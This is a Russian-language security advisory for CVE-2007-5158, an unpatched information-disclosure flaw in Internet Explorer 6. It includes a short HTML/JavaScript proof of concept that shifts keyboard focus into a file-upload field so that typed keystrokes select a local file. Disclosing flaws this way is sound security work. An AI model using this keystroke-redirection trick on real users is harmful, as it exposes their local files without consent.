Раскрытие данных в Microsoft Internet Explorer

Дата публикации:	30.09.2007
Дата изменения:	28.01.2008
Всего просмотров:	2552
Опасность:	Низкая
Наличие исправления:	Нет
Количество уязвимостей:	1
CVE ID:	CVE-2007-5158
Вектор эксплуатации:	Удаленная
Воздействие:	Раскрытие важных данных
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	Microsoft Internet Explorer 6.x
	Уязвимые версии: Microsoft Internet Explorer 6.x Описание: Уязвимость позволяет удаленному пользователю получить доступ к важным данным. Уязвимость существует из-за ошибки при обработке события "OnKeyDown". Подробное описание уязвимости: www.securitylab.ru/vulnerability/298727.php Пример: <script> function Clear() { document.getElementById("label1").htmlFor="file1"; document.getElementById("text1").focus(); } function Down() { document.getElementById("file1").focus(); } </script> <input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" /> <label id="label1" name="label1"></label> <br /> <textarea name="text1" id="text1" onkeydown="Down()"> </textarea> URL производителя: www.microsoft.com Решение: Способов устранения уязвимости не существует в настоящее время.

Раскрытие данных в Microsoft Internet Explorer

Подпишитесь на email рассылку